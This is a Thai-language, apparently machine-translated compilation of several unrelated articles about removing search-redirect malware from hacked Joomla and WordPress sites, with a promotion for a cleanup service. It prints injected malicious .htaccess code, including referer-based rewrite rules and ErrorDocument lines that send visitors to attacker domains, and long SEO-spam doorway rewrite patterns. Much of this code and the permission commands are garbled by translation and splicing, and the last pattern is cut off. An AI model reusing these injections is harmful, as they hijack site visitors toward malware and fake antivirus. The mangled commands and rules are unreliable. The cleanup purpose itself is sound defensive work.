การเปลี่ยนเส้นทางที่เป็นอันตราย ไวรัสโทรจัน JS:Redirector-MC (การเปลี่ยนเส้นทางมือถือ) บนบล็อก WordPress ไวรัสตัวนี้ทำอะไร
วิธีจัดการกับไวรัสเปลี่ยนเส้นทางการค้นหาใน Joomla
วิธีจัดการกับไวรัสเปลี่ยนเส้นทางการค้นหาใน Joomla
28.04.2016
เมื่อดูแลเว็บไซต์ Joomla คุณจะต้องฆ่าเชื้อระบบเป็นระยะๆ หลังจากถูกแฮ็ก สิ่งที่ไม่พึงประสงค์มากที่สุดอย่างหนึ่งคือสิ่งที่เรียกว่าไวรัสเปลี่ยนเส้นทางการค้นหา เมื่อไซต์เสียหายด้วยเชลล์แล้วแทรกส่วนแทรกการเปลี่ยนเส้นทางการค้นหา ส่งผลให้เว็บไซต์ของคุณปรากฏในเครื่องมือค้นหา แต่เปลี่ยนเส้นทางผู้ใช้ไปยังเว็บไซต์ลามกหรือเว็บไซต์อิสลาม . ด้วยเหตุนี้ หลังจากการเปลี่ยนแปลง คุณจะได้รับข้อความต่อไปนี้:
จากนั้นเครื่องมือค้นหาจะเริ่มส่งข้อความที่คล้ายกันเพื่อระบุว่าไซต์ของคุณติดไวรัสหรือถูกแฮ็ก และในยานเดกซ์คุณจะเสียตำแหน่งด้วยซ้ำ ส่งผลให้คุณสูญเสียการเข้าชม สูญเสียลูกค้า ขาดคำสั่งซื้อ
ขั้นตอนการกู้คืน
1. ทำการสำรองและดาวน์โหลด
2. หากโฮสติ้งไม่มีการสแกนไวรัส ให้เรียกใช้การสำรองข้อมูลที่ดาวน์โหลดมาพร้อมกับโปรแกรมป้องกันไวรัส เราพบไฟล์ไวรัสเชลล์ ในกรณีของฉันคือ PHP.Shell.387 นี่คือไวรัสประเภทหนึ่งที่ใช้ประโยชน์จาก "ช่องโหว่" ในความปลอดภัยของระบบควบคุม
3. ลบไฟล์ไวรัสบนโฮสติ้ง
4. เปลี่ยนรหัสผ่านในแผงผู้ดูแลระบบ FTP
5. เนื่องจากการค้นหาโทรจันไม่ได้ให้ผลใดๆ และการค้นหาด้วยตนเองว่าโค้ด PHP ฝังอยู่ที่ไหนจึงใช้เวลานาน และไม่ได้ผลเสมอไป ฉันจึงสร้างส่วนผสมสำรอง Mix คือการสำรองข้อมูลไฟล์ใด ๆ ของไซต์ก่อนที่จะมีไวรัส ฐานข้อมูลยังคงเป็นปัจจุบัน ไม่ใช่จากการสำรองข้อมูล จากนั้นเราจะนำโฟลเดอร์จากการสำรองข้อมูลใหม่ ภาพพร้อมรูปภาพและโฟลเดอร์ ส่วนประกอบcom_jshoppingfilesimg_productsรูปถ่ายสินค้าอยู่ที่ไหน?
ผลลัพธ์: เราพอใจกับผลลัพธ์
ป.ล. จะทำอย่างไรถ้าไม่มีข้อมูลสำรอง? หรือเกี่ยวข้องกับผู้เชี่ยวชาญในเรื่องนี้ บางทีการสำรองข้อมูลโฮสติ้งอาจช่วยได้ แต่จะถูกเขียนทับโดยอัตโนมัติและส่วนใหญ่จะไม่ช่วยคุณประหยัดเนื่องจากจะมีไวรัสอยู่
การป้องกันภายหลัง:
1. การออมไม่จำเป็นต้องประหยัด เปลี่ยนระบบควบคุมถ้าเป็นไปได้
2. เปลี่ยนโฮสติ้งอย่างแน่นอน คุณไม่ควรละเลยเรื่องนี้ จากประสบการณ์ของฉันบน timeweb Joomla ตัวเดียวกันนั้นใช้งานไม่ได้สองครั้ง แต่นั่นก็เป็นปัญหาเพียงครึ่งเดียว สิ่งสำคัญคือโฮสติ้งไม่สแกนเซิร์ฟเวอร์เพื่อหาไวรัสไตรมาสละครั้ง ฉันแนะนำให้ใช้โฮสติ้งที่สแกนแอนตี้ไวรัสทุกวันและยังมีบริการสแกนแอนตี้ไวรัสด้วยตนเองฟรีอีกด้วย ตัวอย่างเช่น นี่คือ reg.ru
3. อย่าบันทึกรหัสผ่าน FTP
สวัสดีทุกคน. บทความสั้น ๆ นี้จะทุ่มเทเพื่อปกป้องบล็อก WordPress ของคุณจากไวรัสและโทรจันเช่น การเปลี่ยนเส้นทางมือถืออาคา JS:ตัวเปลี่ยนเส้นทาง-MCสามารถตรวจพบได้โดยใช้โปรแกรมป้องกันไวรัส AVAST และเบราว์เซอร์ OPERA โปรแกรมป้องกันไวรัสอื่น ๆ ยังไม่เห็นฉันขอย้ำอีกครั้งว่าพวกเขายังไม่เห็น
หากคุณสังเกตเห็นไวรัสนี้ในบล็อกของคุณ ก็ไม่มีอะไรต้องกังวล ตอนนี้ฉันจะสอนวิธีจัดการกับโรคนี้ให้คุณ เมื่อคุณเข้าถึงไซต์โดยใช้เบราว์เซอร์ Opera คุณจะเห็นหน้าต่าง “โทรจันถูกบล็อก” การติดไวรัส “ JS:ตัวเปลี่ยนเส้นทาง-MC"นี่คือการเปลี่ยนเส้นทางมือถือของเรา
เราจะต่อสู้กับมันด้วยวิธีต่อไปนี้
เปิดไฟล์ function.php และที่ด้านล่างสุดคุณจะพบโค้ดต่อไปนี้:
หน้าที่ของเราคือการลบโค้ดนี้
คุณสามารถทำได้หลายวิธี:
- ลบรหัสด้วยตนเอง
- ค้นหาสำเนาของไฟล์ function.php แล้วอัปโหลดใหม่ไปยังโฮสติ้งของคุณ
หลังจากที่คุณลบโค้ดนี้แล้ว เราจะตรวจสอบบล็อกของเราโดยใช้บริการออนไลน์พิเศษเพื่อดูว่ายังมีการติดไวรัสในบล็อกหรือไม่
คุณอาจมีคำถามว่าไวรัสนี้มาจากไหน ฉันค้นหาคำตอบในอินเทอร์เน็ตและพบคำตอบที่ไม่ได้ทำให้ฉันมีความสุขมากนัก ฉันจึงโพสต์ไว้ที่นี่เป็นภาพหน้าจอ
จากสิ่งที่เราได้อ่าน เราสามารถสรุปได้ว่าบริการ WordPress ของเราไม่ปลอดภัย 100%
ฉันติดไวรัสนี้ใน 2 บล็อก ฉันแนะนำให้คุณตรวจสอบบล็อกของคุณเพื่อหาไวรัส โดยเฉพาะที่อยู่บน Timeweb โฮสติ้ง
หากตรวจไม่พบไวรัสทันเวลา บล็อกของคุณอาจตกตำแหน่งอย่างรวดเร็ว มีเปอร์เซ็นต์ความล้มเหลวสูงและโดยทั่วไปไม่มีอะไรดีรอคุณอยู่
หลังจากลบไวรัสออกแล้ว ฉันขอแนะนำ:
- อัพเดตWordPress
- เปลี่ยนรหัสผ่าน Ftp
- เปลี่ยนรหัสผ่านโฮสติ้ง
- ทำการสแกนไวรัสในคอมพิวเตอร์ของคุณโดยสมบูรณ์
หากบล็อกของคุณถูกแฮ็ก ฉันได้เขียนเกี่ยวกับเรื่องนี้แล้ว สิ่งที่สำคัญที่สุดคือการสังเกตและแก้ไขให้ตรงเวลา หากมีบางอย่างใช้งานไม่ได้หรือไม่ชัดเจน โปรดติดต่อฉันเพื่อขอความช่วยเหลือ
Virusday ช่วยให้คุณสามารถลบไวรัสเปลี่ยนเส้นทางออกจากเว็บไซต์ของคุณ การเปลี่ยนเส้นทางคือการเปลี่ยนเส้นทางของผู้ใช้ไปยังไซต์บุคคลที่สามเมื่อพยายามดูหน้าต่างๆ บนไซต์ดั้งเดิม โดยทั่วไปแล้ว การเปลี่ยนเส้นทางดังกล่าวเปลี่ยนเส้นทางผู้ใช้ไปยังไซต์ที่มีการเผยแพร่มัลแวร์หรือซอฟต์แวร์ฉ้อโกง (เช่น ภายใต้หน้ากากของการอัปเดตเว็บเบราว์เซอร์) การดาวน์โหลดและติดตั้งโปรแกรมดังกล่าวอาจทำให้คอมพิวเตอร์หรืออุปกรณ์มือถือของคุณติดไวรัส
ในกรณีส่วนใหญ่ โค้ดที่เป็นอันตรายจะถูกเขียนในไฟล์ .htaccess ซึ่งอยู่ที่รากของไซต์ของคุณ โค้ดที่เป็นอันตรายมักจะมีลักษณะดังนี้:
เขียนโปรแกรมใหม่อีกครั้ง
เขียนใหม่ %(HTTP_REFERER) .*yandex.*
เขียนใหม่ %(HTTP_REFERER) .*google.*
เขียนใหม่ %(HTTP_REFERER) .*bing.*
กฎการเขียนใหม่ ^(.*)$ http://maliciouswebsite.net/index.php?t=6
กฎการเปลี่ยนเส้นทางดังกล่าวจะเปลี่ยนเส้นทางผู้ใช้จากเครื่องมือค้นหา Yandex, Google และ Bing ไปยังเว็บไซต์ Malwarewebsite.net
การเปลี่ยนเส้นทางอุปกรณ์เคลื่อนที่มักเป็นเรื่องปกติ โดยส่งผลต่อผู้ใช้ที่เข้าชมทรัพยากรของคุณจากอุปกรณ์เคลื่อนที่เท่านั้น
การรักษาไวรัส
เราขอแนะนำให้ใช้บริการ Virusday ซึ่งสามารถตรวจจับและลบการเปลี่ยนเส้นทางที่เป็นอันตรายได้โดยอัตโนมัติ หากคุณต้องการลบด้วยตนเอง คำแนะนำมีดังนี้:
1. สร้างการเชื่อมต่อกับเว็บไซต์ของคุณผ่านตัวจัดการไฟล์ FTP
2. ค้นหาไฟล์ .htaccess ในไดเร็กทอรีรากของไซต์
3. ลบโค้ดที่เป็นอันตรายและบันทึกไฟล์
ตอนนี้การเปลี่ยนเส้นทางถูกลบออกแล้ว ดูเหมือนว่าคุณจะหายใจสะดวก แต่คุณไม่รู้ว่ามันถูกวางไว้ในไฟล์ของคุณอย่างไรและโดยใคร และคุณไม่รู้ว่ามันจะเกิดขึ้นอีกหรือไม่ แต่คุณสงสัยอย่างชัดเจน ว่ามันจะ สิ่งที่เหลืออยู่คือพยายามค้นหาช่องโหว่ที่ผู้โจมตีสามารถเจาะไฟล์ในเว็บไซต์ของคุณได้ Virusday สามารถค้นหาและทำลายเชลล์ที่ช่วยให้ผู้โจมตีสามารถเข้าถึงไฟล์ของคุณได้อย่างเต็มที่
เปลี่ยนเส้นทางไวรัสในไฟล์ PHP
มีการเปลี่ยนเส้นทางหลายประเภทที่ต้องการลงทะเบียน ไม่เพียงแต่ในไฟล์ .htaccess เท่านั้น แต่ยังอนุญาตให้ตนเองลงทะเบียนในไฟล์ PHP จำนวนมาก (หลายร้อยหรือหลายพันไฟล์) ได้อย่างง่ายดาย คุณจะไม่สามารถตรวจพบบรรทัดที่เป็นอันตรายดังกล่าวในไฟล์ได้อย่างชัดเจน อย่างไรก็ตาม เมื่อคุณเรียกใช้ไฟล์ PHP ใดๆ การเปลี่ยนเส้นทางบนไซต์ของคุณจะเกิดขึ้นอีกครั้ง เพื่อกำจัดไวรัสเปลี่ยนเส้นทางอย่างสมบูรณ์ เราขอแนะนำให้ใช้บริการ Virusday Virusday ตรวจจับและลบการเปลี่ยนเส้นทางในไฟล์ .htaccess และ *.php
ไวรัสรูปแบบใหม่ที่เห็นว่าฉันไม่รู้มีผลกระทบอย่างมากต่อไซต์ที่โฮสต์อยู่ เซิร์ฟเวอร์ที่ไม่น่าเชื่อถือโดยที่ผู้ใช้บัญชี/บัญชีย่อยสามารถ “เห็น” กันได้ โดยเฉพาะบัญชีโฮสติ้งทั้งหมดถูกสร้างไว้ในโฟลเดอร์ " โฮสต์เสมือน“การเขียนและกฎหมาย โฟลเดอร์ผู้ใช้"โดเมนเสมือน" มอบให้กับผู้ใช้ทั่วไป...ผู้ค้าปลีกในสถานการณ์ส่วนใหญ่ นี่เป็นวิธีการที่ไม่ได้ใช้เว็บเซิร์ฟเวอร์ทั่วไป WHM/แผงควบคุม.
Action.htaccess - แฮ็ค .htaccess
ไวรัสส่งผลกระทบต่อไฟล์ .htaccessผู้ที่ตกเป็นเหยื่อของเว็บไซต์ เพิ่มบรรทัด / คำสั่งถึง เปลี่ยนเส้นทางผู้เยี่ยมชม(ขึ้นอยู่กับ Yahoo, MSN, Google, facebook, yaindex, Twitter, MySpace ฯลฯ ไซต์และพอร์ทัลที่มีการเข้าชมสูง) ไปยังบางไซต์ที่นำเสนอ " โปรแกรมป้องกันไวรัส- "นี้ โปรแกรมป้องกันไวรัสปลอมเกี่ยวกับสิ่งที่ฉันเขียนไว้ในคำนำ
นี่คือสิ่งที่ดูเหมือน .htaccessเหยื่อ: ( ไม่สามารถเข้าถึงเนื้อหาของลิงค์ด้านล่าง )
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=3เขียนโปรแกรมใหม่อีกครั้ง
เขียนใหม่Cond%(HTTP_REFERER) * ยานเดกซ์ -
เขียนใหม่%(HTTP_REFERER) * เพื่อนร่วมชั้น -
เขียนใหม่%(HTTP_REFERER) * VKontakte. -
เขียนใหม่Cond%(HTTP_REFERER) * แรมเบลอร์. -
เขียนใหม่%(HTTP_REFERER) *หลอด. -
เขียนใหม่%(HTTP_REFERER) *วิกิพีเดีย -
เขียนใหม่%(HTTP_REFERER) * บล็อกเกอร์ -
เขียนใหม่%(HTTP_REFERER) * ไป่ตู้. -
เขียนใหม่%(HTTP_REFERER) * Qq.com -
เขียนใหม่%(HTTP_REFERER) *มายสเปซ. -
เขียนใหม่%(HTTP_REFERER) *ทวิตเตอร์. -
เขียนใหม่%(HTTP_REFERER) *เฟซบุ๊ก. -
เขียนใหม่%(HTTP_REFERER) *Google. -
เขียนใหม่%(HTTP_REFERER) *สด. -
เขียนใหม่%(HTTP_REFERER) *เอโอแอล. -
เขียนใหม่%(HTTP_REFERER) * ปิง. -
เขียนใหม่%(HTTP_REFERER) *อเมซอน. -
เขียนใหม่%(HTTP_REFERER) * อีเบย์. -
เขียนใหม่%(HTTP_REFERER) * ลิงค์อิน -
เขียนใหม่%(HTTP_REFERER) *ฟลิคเกอร์. -
เขียนใหม่%(HTTP_REFERER) *ไลฟ์จัสมิน. -
เขียนใหม่%(HTTP_REFERER) * โซโซ. -
เขียนใหม่%(HTTP_REFERER) *ดับเบิ้ลคลิก -
เขียนใหม่%(HTTP_REFERER) *พรฮับ. -
เขียนใหม่%(HTTP_REFERER) *ออร์คุต -
เขียนใหม่%(HTTP_REFERER) * วารสารสด -
เขียนใหม่%(HTTP_REFERER) *เวิร์ดเพรส. -
เขียนใหม่%(HTTP_REFERER) * ยาฮู. -
เขียนใหม่%(HTTP_REFERER) *ถาม. -
เขียนใหม่%(HTTP_REFERER) *ตื่นเต้น -
เขียนใหม่%(HTTP_REFERER) *อัลตาวิสต้า. -
เขียนใหม่%(HTTP_REFERER) *เอ็มเอสเอ็น -
เขียนใหม่%(HTTP_REFERER) *เน็ตสเคป -
เขียนใหม่%(HTTP_REFERER) *ฮอตบอท. -
เขียนใหม่%(HTTP_REFERER) * โกโตะ. -
เขียนใหม่%(HTTP_REFERER) * อินโฟซีก. -
เขียนใหม่%(HTTP_REFERER) * แม่. -
เขียนใหม่%(HTTP_REFERER) *ทุกเว็บ. -
เขียนใหม่%(HTTP_REFERER) *ไลคอส -
เขียนใหม่%(HTTP_REFERER) * ค้นหา. -
เขียนใหม่%(HTTP_REFERER) * MetaCrawler -
เขียนใหม่%(HTTP_REFERER) *เมล์. -
เขียนใหม่%(HTTP_REFERER) * ด็อกไพล์. -
เขียนกฎใหม่ -RewriteCond%() REQUEST_FILENAME!-E
RewriteCond%() REQUEST_FILENAME!-D
RewriteCond%() * REQUEST_FILENAME Jpg $ |!. - กิ๊ฟ$ | - PNG$
เขียนใหม่%(HTTP_USER_AGENT) *หน้าต่าง*.
เขียนกฎใหม่ -
ผู้ที่ใช้ WordPress จะพบบรรทัดเหล่านี้ในไฟล์ .htaccessจาก public_html- นอกจากนี้ไวรัสยังสร้าง htaccess อยู่ในโฟลเดอร์เดียวกัน เนื้อหา WP.
*นอกจากนี้ยังมีสถานการณ์ที่ peoriavascularsurgery.com ปรากฏขึ้นแทน dns.thesoulfoodcafe.com หรือที่อยู่อื่นๆ
ไวรัสตัวนี้ทำอะไร?
เมื่อเปลี่ยนเส้นทางแล้ว ผู้เยี่ยมชมจะได้รับการต้อนรับด้วยข้อความ:
ความสนใจ!
คอมพิวเตอร์มีสัญญาณต่างๆ ที่แสดงว่ามีไวรัสและมัลแวร์ ระบบป้องกันไวรัสของคุณต้องได้รับการตรวจสอบทันที!
ระบบรักษาความปลอดภัยจะทำการสแกนไวรัสและมัลแวร์ในคอมพิวเตอร์ของคุณอย่างรวดเร็วและฟรี
ไม่ว่าจะกดปุ่มไหนเราก็จะพาไปที่เพจ” คอมพิวเตอร์ของฉัน“สร้างขึ้นเพื่อเลียนแบบ เอ็กซ์พีดีไซน์- การดำเนินการนี้จะเริ่มต้น "การสแกน" โดยอัตโนมัติเมื่อสิ้นสุดซึ่งเราพบว่ามี "การติดเชื้อ"
หลังจากคลิกปุ่มตกลงหรือยกเลิก มันก็จะเริ่มต้นขึ้น ดาวน์โหลดไฟล์ setup.exe- นี้ setup.exe เป็นโปรแกรมป้องกันไวรัสปลอมส่งผลกระทบต่อระบบ การติดตั้งมัลแวร์บางตัวแพร่กระจายไปไกลกว่าลิงก์ที่ถูกบุกรุก และนอกเหนือจากนั้น ซอฟต์แวร์ป้องกันไวรัส(เท็จทั้งหมด) ที่เหยื่อถูกเสนอให้ซื้อ
ผู้ที่เคยติดต่อไวรัสแล้วสามารถใช้แบบฟอร์มนี้ได้ นอกจากนี้ ขอแนะนำให้สแกนฮาร์ดไดรฟ์ทั้งหมด แนะนำ แคสเปอร์สกี้ อินเตอร์เน็ต ซีเคียวริตี้หรือ แคสเปอร์สกี้ แอนตี้ไวรัส.
ไวรัสประเภทนี้จะแพร่เชื้อไปยังผู้เยี่ยมชมระบบปฏิบัติการ OS วินโดว์ XP, วินโดว์ ME, วินโดว์ 2000, วินโดว์ NT, วินโดว์ 98และ Windows 95 จนถึงปัจจุบัน ยังไม่พบกรณีการติดไวรัสในระบบปฏิบัติการ Windows Vista และ Windows 7
เราจะกำจัดไวรัสนี้ได้อย่างไร ไฟล์ Htaccess ไปยังเซิร์ฟเวอร์และวิธีป้องกันการติดไวรัส
1. การวิเคราะห์ไฟล์ที่น่าสงสัยและการลบรหัสเพื่อให้แน่ใจว่าไฟล์นั้นไม่ได้ถูกแตะเท่านั้น .htaccessคุณควร วิเคราะห์ไฟล์ทั้งหมด .phpศรี - เจส.
2. เขียนทับไฟล์ Htaccess และติดตั้ง ซีเอ็มโอดี 644หรือ 744 ด้วยการเข้าถึงการเขียนเท่านั้น เจ้าของผู้ใช้.
3. เมื่อสร้างบัญชีโฮสติ้งสำหรับเว็บไซต์ในโฟลเดอร์ / บ้านหรือ /webrootสิ่งนี้จะสร้างโฟลเดอร์ที่มักจะมีชื่อผู้ใช้โดยอัตโนมัติ ( ผู้ใช้ Cpanel, FTPฯลฯ) เพื่อป้องกันการบันทึกข้อมูลและการส่งไวรัสจากผู้ใช้รายหนึ่งไปยังอีกรายหนึ่ง ขอแนะนำให้ตั้งค่าโฟลเดอร์ของผู้ใช้แต่ละคนเป็น:
แสดง CHMOD 644 หรือ 744, 755 - 644
Chaun-R number_user number_folder
CHGRP-R number_user number_folder
LS-ทั้งหมดวิธีตรวจสอบว่าทำถูกต้องหรือไม่ สิ่งนี้ควรปรากฏขึ้น:
ไดนามิกของลำโพงไดนามิก drwx-x-x 12 4096 6 พฤษภาคม 14: ไดนามิก 51 /
drwx-x-x 10 duran duran 4096 7 มี.ค. 07: 46 duran /
drwx-x-x 12 หลอด หลอดทดลอง 4096 29 ม.ค. 11:23 หลอด /
drwxr-xr-x 14 ด่วน 4096 26 ก.พ. 2552 ด่วน /
drwxr-xr-x 9 ezo ezo 4096 19 พฤษภาคม 01: 09 ezo /
drwx-x-x 9 ฟาร์ม 4096 ฟาร์ม 19 22: 29 ฟาร์ม /
หากหนึ่งใน userele FTP ข้างต้น ไฟล์ที่ติดไวรัสเธอไม่สามารถส่งไวรัสไปยังผู้ใช้รายอื่นของโฮสต์ได้ มาตรการรักษาความปลอดภัยขั้นต่ำเพื่อปกป้องบัญชีที่โฮสต์บนเว็บเซิร์ฟเวอร์
องค์ประกอบทั่วไปของพื้นที่ที่ได้รับผลกระทบจากไวรัสนี้
พื้นที่ทั้งหมดที่ได้รับผลกระทบเปลี่ยนเส้นทางผู้เยี่ยมชมไปยังไซต์ที่มีชื่อโดเมนที่มี "/ main.php? อี = 4&ชม ".
นี้ " ไวรัส. Htaccess"ส่งผลกระทบต่อ CMS ใด ๆ ( จูมลา, เวิร์ดเพรส, PHPBBฯลฯ) การใช้ .htaccess.
- แฮ็คไวรัสเปลี่ยนเส้นทาง Htaccess &.
ที่เป็นอันตราย/ไวรัส - .htaccess "เขียนใหม่" และเปลี่ยนเส้นทางไม่มีเจ้าของเว็บไซต์ต้องการให้การรับส่งข้อมูลจากเว็บไซต์ของเขาผ่านการเปลี่ยนเส้นทางไปยังไซต์ที่ไม่รู้จัก - สิ่งนี้ไม่น่าสนใจสำหรับลูกค้า บ่อนทำลายความมั่นใจของลูกค้า และทำให้เกิดการคว่ำบาตรจากเครื่องมือค้นหาและโปรแกรมป้องกันไวรัส
ในบทความนี้ ฉันจะดูตัวเลือกหลักสำหรับการฝังการเปลี่ยนเส้นทางไวรัส
ความสนใจ! การลบการเปลี่ยนเส้นทางจะเป็นการลบเฉพาะผลที่ตามมา เพื่อป้องกันสถานการณ์ไม่ให้เกิดซ้ำ คุณควรค้นหาสาเหตุของไวรัสที่เข้าสู่ไซต์!
นอกจากนี้ สแกนเนอร์และโปรแกรมป้องกันไวรัสตรวจพบการเปลี่ยนเส้นทางที่เป็นอันตรายได้ไม่ดี ดังนั้นคุณจึงมักจะต้องค้นหาแหล่งที่มาของความชั่วร้ายด้วยตนเอง
ก่อนอื่น เรามองหาการแทรกโค้ดลงในไฟล์ .htaccessโดยเฉพาะที่รากของไซต์
ทุกสิ่งที่เกี่ยวข้องกับ เขียนใหม่มันคุ้มค่าที่จะตรวจสอบว่ามันเปลี่ยนเส้นทางไปที่ไหน
ด้านล่างนี้ฉันจะให้ส่วนแทรกที่เป็นอันตรายสองสามรายการซึ่งสร้างทางเข้าประตูและหน้าเว็บหลายพันหน้าในการค้นหาที่เรียกว่าสแปมญี่ปุ่น (สแปม SEO หน้าเว็บที่มีอักษรอียิปต์โบราณ - มีหลายชื่อ):
กฎการเขียนใหม่ ^([^\d\/]+)-(+)-(+)%(.*)+%+%([^\d\/]+)+%(.*)+%+%( [^\d\/]+)+%(.*)+%+%([^\d\/]+)([^\d\/]+)%(.*)+%+%+% (.*)+%+%(.*)F%(.*)+%(.*)+%([^\d\/]+)(+)%(.*)+%+%+% +%(.*)+%(.*)+%([^\d\/]+)+%(.*)+%+%+%(.*)+%+%+%(.*) +%(.*)+%+%(.*)+%([^\d\/]+)(.*)%(.*)+%(.*)+%(.*)(.* )%([^\d\/]+)F%(.*)+%+%([^\d\/]+)+%(.*)+%+%+(+)%(.* )+%+%(.*)(.*)%(.*)+%+%([^\d\/]+)+%(.*)+%+%(.*)([^\ d\/]+)%(.*)+%(.*)+%(.*)(+)%(.*)+%(.*)(.*)%+(.*)%(. *)+%+F%(.*)F%(.*)+%+%([^\d\/]+)(+)%(.*)+%+%(.*)([^ \d\/]+)%+\/.*..*$ ?$65$39=$62&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^(+)\/([^\d\/]+)(+)(.*)+%+%+.*-S.*-.*-F.*-([^\d\/ ]+).*-+..*$ ?$7$1=$3&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)(+)+%+([^\d\/]+)+%+(+)+%+([^\d \/]+)+%+(+)+%+([^\d\/]+)+%+(+)+%+([^\d\/]+)(+)%+(+ )+%+%+(+)+%+([^\d\/]+)-.*-+..*$ ?$15$1=$14&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^([^\d\/]+)-(+)-(+)-+.*+..*$ ?$1$3=$2&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^(+)\/([^\d\/]+)(+).*HM+L.*+.*+N.*+YW.*+.*+.*(+)+.* +F.*W+.*+.*F+ZW.*HR.*(.*)--$ ?$2$10=$3&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+).*+..*$ ?$2$1=$3&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+).*..*$ ?$2$1=$3&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+).*(+).*L+N.*YXJ.*HJ.*WF.*+.*Y+.*(.* ).*R.*Y.*V.*+Q.*$ ?$2$1=$4&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)\/$ ?$2$1=$3&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+).*(+).*L+.*+.*+YW.*+.*+.*(+)+-$ ? $2$8=$4&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)(.*)%+F%+F.*..*%+F.*-.*-.*-.*% +F&.*=.*$ ?$2$1=$3&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^(+)\/([^\d\/]+)(+).*HM+L.*+.*F+ZW.*WF.*+.*Y+.*(.*).* ZG+.*ZXN+.*WN.*ZH(.*).*$ ?$2$1=$3&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)%([^\d\/]+)(.*)%(+)+%+%(+)+%([ ^\d\/]+)([^\d\/]+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+ )(+)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)(+)%(+ )+%+([^\d\/]+)%(+)+%([^\d\/]+)+-%(+)+%+%(+)+%([^\d \/]+)+%(+)+%+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)F%(+ )+%+%(+)+%+([^\d\/]+)$ ?$36$1=$35&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^([^\d\/]+)-(+)-(+)\/+%(+)+%+.*+$ ?$1$3=$4&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)(.*)%+F%+F.*..*%+F.*-.*-.*-.*- .*%+F$ ?$2$1=$3&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)(.*)%+F%+F.*..*%+F.*-+-.*-.*- *-.*-.*%+F&.*=.*$ ?$2$1=$3&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)_+..*$ ?$2$1=$3&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^([^\d\/]+)-(+)-(+)\/.*-.*-+-.*\/$ ?$1$3=$2&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^([^\d\/]+)-(+)-(+)\/+.*\/$ ?$1$3=$2&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)(.*)+%+%+-.*+..*$ ?$2$1=$3&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)-.*-V.*%+(.*)+%+%+.*-S.*+..*$ ? $2$1=$3&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^([^\d\/]+)-(+)-(+)\/.*-.*-+\/$ ?$1$3=$2&%(QUERY_STRING)[L]
กฎการเขียนใหม่ ^(+)\/([^\d\/]+)(+)-+..*$ ?$2$1=$3&%(QUERY_STRING)[L]
เขียนกฎใหม่ ^(+)\/([^\d\/]+)(+)..*&.*=.*\:\/.*-+..*\/.*-.*-.* -.*-.*-.*\/&.*=+K([^\d\/]+)&.*=%(+)+%(.*)+%(+)+%([ ^\d\/]+)(.*)%(+)+%+%(+)+%([^\d\/]+)(.*)+%(+)+%([^\ d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%+%(+)+%([^\d\/]+)+ %(+)+%+%(+)+%+(+)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^ \d\/]+)++%(+)+%++%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+) +%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+ )(+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\ d\/]+)++%(+)+%([^\d\/]+)++%(+)+%([^\d\/]+)F%(+)+%( [^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%+%(+)+% ([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+) %(+)+%([^\d\/]+)+&.*=+&.*=+&.*=+&.*=.*\:\/.*+..*.. *..*\/.*\?.*=OIP.(.*).*U.*+.*(+).*U.*+.*+V+.*Q(.*).*( +).*&.*=+.+&.*=+&.*=+&.*=+&.*=+&.*=+&.*=%(+)+%(.*) +%(+)+%([^\d\/]+)(.*)%(+)+%+%(+)+%([^\d\/]+)(.*)+% (+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%+%(+)+%([ ^\d\/]+)+%(+)+%+%(+)+%+(+)%(+)+%([^\d\/]+)+%(+)+%+ %(+)+%([^\d\/]+)++%(+)+%++%(+)+%([^\d\/]+)+%(+)+%( [^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+% ([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)% (+)+%([^\d\/]+)++%(+)+%([^\d\/]+)++%(+)+%([^\d\/]+ )F%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%+%(+) +%+%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\ d\/]+)(+)%(+)+%([^\d\/]+)+&.*=+.*+.*&.*=+.*+.*&.*= 